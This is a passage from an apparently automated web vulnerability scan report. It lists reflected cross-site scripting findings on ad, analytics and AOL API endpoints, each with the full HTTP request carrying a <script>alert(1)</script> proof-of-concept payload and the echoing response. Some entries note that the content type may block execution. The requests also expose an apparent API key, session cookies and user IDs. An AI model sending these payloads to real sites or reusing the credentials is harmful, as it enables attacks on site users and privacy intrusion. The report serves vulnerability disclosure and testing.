Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3414


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "1512388552fa--><script>alert(1)</script>fa864e4f42d" -->
...[SNIP]...

1.180. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload b5d4d--><script>alert(1)</script>23818e2f9a1 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1512388&pid=1098767&ps=-1b5d4d--><script>alert(1)</script>23818e2f9a1&zw=250&zh=325&url=http%3A//www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/&v=5&dct=Chris%20Pontius%20to%20Divorce%20--%20'Jackass'%20Star's%20Marriage%20--%20The%20Party's%20Over%20%7C%20TMZ.com&ref=http%3A//www.tmz.com/&metakw=chris%20pontius%20divorce,jackass%20star%20divorce,claire%20nolan HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/03/22/chris-pontius-party-boy-jackass-divorce-claire-nolan/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3853


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1b5d4d--><script>alert(1)</script>23818e2f9a1" -->
   
...[SNIP]...

1.181. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload d6988<script>alert(1)</script>ed5d2d40fa6 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1460828&pid=1039767d6988<script>alert(1)</script>ed5d2d40fa6&ps=-1&zw=270&zh=325&url=http%3A//www.tmz.com/signup/&v=5&dct=Sign%20Up%20%3A%20TMZ&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signup/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:45 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2510


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "1039767d6988<script>alert(1)</script>ed5d2d40fa6"

   
                                                           </head>
...[SNIP]...

1.182. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 29ff0--><script>alert(1)</script>fdf4fdf96f2 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=146082829ff0--><script>alert(1)</script>fdf4fdf96f2&pid=1039767&ps=-1&zw=270&zh=325&url=http%3A//www.tmz.com/signup/&v=5&dct=Sign%20Up%20%3A%20TMZ&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signup/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:43 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3263


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "146082829ff0--><script>alert(1)</script>fdf4fdf96f2" -->
...[SNIP]...

1.183. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 795cc--><script>alert(1)</script>a8659e6fe24 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=&placementId=1460828&pid=1039767&ps=-1795cc--><script>alert(1)</script>a8659e6fe24&zw=270&zh=325&url=http%3A//www.tmz.com/signup/&v=5&dct=Sign%20Up%20%3A%20TMZ&metakw=Celebrity,Celebrity%20Gossip,Celebrity%20Photos,Hollywood%20Rumors,Entertainment%20News HTTP/1.1
Host: ads.tw.adsonar.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/signup/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:48 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3702


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "-1795cc--><script>alert(1)</script>a8659e6fe24" -->
   
...[SNIP]...

1.184. http://api.bizographics.com/v1/profile.json [&callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload d4ba4<script>alert(1)</script>bc87e6e849a was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callbackd4ba4<script>alert(1)</script>bc87e6e849a&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=11; BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=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

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 23 Mar 2011 19:39:57 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=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;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 414
Connection: keep-alive

cnnad_bizo_load_ad_callbackd4ba4<script>alert(1)</script>bc87e6e849a({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"information_technology","name":"Infor
...[SNIP]...

1.185. http://api.bizographics.com/v1/profile.json [api_key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is echoed, unmodified, inside the 403 error message "Unknown API key: (...)". The payload bbc7c<script>alert(1)</script>5c175562314 was submitted in the api_key parameter.

This shows the parameter is reflected without encoding. The error body is served as text/plain, so a browser that honours the Content-Type shows the tag as text rather than executing it; exploitation would depend on the browser sniffing the body as HTML, which this report does not test.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr4bbc7c<script>alert(1)</script>5c175562314 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=11; BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=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

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 23 Mar 2011 19:40:09 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (vuy5aqx2hg8yv997yw9e5jr4bbc7c<script>alert(1)</script>5c175562314)

1.186. http://api.screenname.aol.com/auth/getToken [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.screenname.aol.com
Path:   /auth/getToken

Issue detail

The value of the c request parameter is used as the JSONP callback name and is echoed at the start of the response body. The payload c0fb7<script>alert(1)</script>4eb17889752 was submitted in the c parameter and was echoed unmodified. Note that the JSON body itself reports statusCode 400, "Invalid callback": the server recognises the callback as invalid and still writes it, unencoded, in front of that error.

This proof-of-concept shows that arbitrary text can be placed at the front of the response. The response is served as application/json; whether a browser executes the echoed <script> tag depends on the body being sniffed as HTML, which this report does not test. A rejected callback name should not be echoed at all.

Request

GET /auth/getToken?devId=ao106HS28rHt73lS&attributes=displayName,loginId,profileUrl,pictureUrl,providerStr,providerDisplayName&f=json&c=jsonp1300831459267c0fb7<script>alert(1)</script>4eb17889752 HTTP/1.1
Host: api.screenname.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aolnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26B17114051D1312-60000137800000AA[CE]; s_pers=%20s_getnr%3D1299589746302-New%7C1362661746302%3B%20s_nrgvo%3DNew%7C1362661746303%3B

Response

HTTP/1.1 200 OK
Date: Tue, 22 Mar 2011 22:05:30 GMT
Set-Cookie: JSESSIONID=3125B55D850FB8447F6406A14870FE92; Path=/auth
Set-Cookie: OASC=diAxLjAgayAwIHZXVUdXWG5JR3RwcjBjVW1zVjdvcDVkV292OD0%3D-SSQdmqasJXW7AratTMW0Ebo0fFONkRgKFU1mS%2B7aRm1K3m4HomBFqlhs1Aa2f2iG; Path=/; HTTPOnly
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 130

jsonp1300831459267c0fb7<script>alert(1)</script>4eb17889752({"response": {"statusCode": 400, "statusText": "Invalid callback"}});

1.187. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the response. The payload b50f9<script>alert(1)</script>f168daa8440 was submitted in the c1 parameter and was echoed unmodified.

This proof-of-concept shows the value is reflected without encoding. As echoed, the payload stays inside the string literal: the response is served as application/x-javascript, not HTML, so the <script> tags are inert unless a browser sniffs the body as HTML. Breaking out of the literal would require an unescaped " or \ in the value, which this report does not test.

Request

GET /beacon.js?c1=7b50f9<script>alert(1)</script>f168daa8440&c2=5964888&c3=2&c4=&c5=&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7b50f9<script>alert(1)</script>f168daa8440", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.188. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the response. The payload 3463d<script>alert(1)</script>652bf18a907 was submitted in the c15 parameter and was echoed unmodified.

This proof-of-concept shows the value is reflected without encoding. As echoed, the payload stays inside the string literal: the response is served as application/x-javascript, not HTML, so the <script> tags are inert unless a browser sniffs the body as HTML. Breaking out of the literal would require an unescaped " or \ in the value, which this report does not test.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=3463d<script>alert(1)</script>652bf18a907&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"3463d<script>alert(1)</script>652bf18a907", c16:"", r:""});

1.189. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the response. The payload 801a4<script>alert(1)</script>286c167a590 was submitted in the c2 parameter and was echoed unmodified.

This proof-of-concept shows the value is reflected without encoding. As echoed, the payload stays inside the string literal: the response is served as application/x-javascript, not HTML, so the <script> tags are inert unless a browser sniffs the body as HTML. Breaking out of the literal would require an unescaped " or \ in the value, which this report does not test.

Request

GET /beacon.js?c1=7&c2=5964888801a4<script>alert(1)</script>286c167a590&c3=2&c4=&c5=&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888801a4<script>alert(1)</script>286c167a590", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.190. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the response. The payload 77d24<script>alert(1)</script>f2b8119079a was submitted in the c3 parameter and was echoed unmodified.

This proof-of-concept shows the value is reflected without encoding. As echoed, the payload stays inside the string literal: the response is served as application/x-javascript, not HTML, so the <script> tags are inert unless a browser sniffs the body as HTML. Breaking out of the literal would require an unescaped " or \ in the value, which this report does not test.

Request

GET /beacon.js?c1=7&c2=5964888&c3=277d24<script>alert(1)</script>f2b8119079a&c4=&c5=&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"277d24<script>alert(1)</script>f2b8119079a", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.191. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the response. The payload 8fd25<script>alert(1)</script>15769badf77 was submitted in the c4 parameter and was echoed unmodified.

This proof-of-concept shows the value is reflected without encoding. As echoed, the payload stays inside the string literal: the response is served as application/x-javascript, not HTML, so the <script> tags are inert unless a browser sniffs the body as HTML. Breaking out of the literal would require an unescaped " or \ in the value, which this report does not test.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=8fd25<script>alert(1)</script>15769badf77&c5=&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"8fd25<script>alert(1)</script>15769badf77", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.192. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the response. The payload 52d74<script>alert(1)</script>ea9f67b9526 was submitted in the c5 parameter and was echoed unmodified.

This proof-of-concept shows the value is reflected without encoding. As echoed, the payload stays inside the string literal: the response is served as application/x-javascript, not HTML, so the <script> tags are inert unless a browser sniffs the body as HTML. Breaking out of the literal would require an unescaped " or \ in the value, which this report does not test.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=52d74<script>alert(1)</script>ea9f67b9526&c6=&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"52d74<script>alert(1)</script>ea9f67b9526", c6:"", c10:"", c15:"", c16:"", r:""});

1.193. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into a double-quoted JavaScript string literal in the COMSCORE.beacon({...}) call at the end of the response. The payload 97fd8<script>alert(1)</script>1f25e258caa was submitted in the c6 parameter and was echoed unmodified.

This proof-of-concept shows the value is reflected without encoding. As echoed, the payload stays inside the string literal: the response is served as application/x-javascript, not HTML, so the <script> tags are inert unless a browser sniffs the body as HTML. Breaking out of the literal would require an unescaped " or \ in the value, which this report does not test.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=97fd8<script>alert(1)</script>1f25e258caa&c15=&tm=185475 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=6d0f24-24.143.206.42-1297806131

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Tue, 29 Mar 2011 22:03:26 GMT
Date: Tue, 22 Mar 2011 22:03:26 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"97fd8<script>alert(1)</script>1f25e258caa", c10:"", c15:"", c16:"", r:""});

1.194. http://c.aol.com/read/_share_counts [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.aol.com
Path:   /read/_share_counts

Issue detail

The value of the callback request parameter is used, without validation, as the JSONP callback name and is echoed at the start of the response body. The payload 4950b<script>alert(1)</script>2c4c70b388a was submitted in the callback parameter and was echoed unmodified.

This proof-of-concept shows that arbitrary text can be placed at the front of a response that pages load as a script. The response is served as application/json, so a browser that honours the Content-Type does not render the echoed <script> tag as HTML; script execution in a victim's browser would additionally depend on the body being sniffed as HTML, which this report does not test. The missing callback check is the defect to fix.

Request

GET /read/_share_counts?return_obj=true&permalink=http%3A%2F%2Fwww.aolnews.com%2F2011%2F03%2F22%2Fus-commander-we-wont-stop-until-libya-is-in-compliance%2F&dirty=true&callback=jsonp13008314972494950b<script>alert(1)</script>2c4c70b388a HTTP/1.1
Host: c.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aolnews.com/category/nation/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
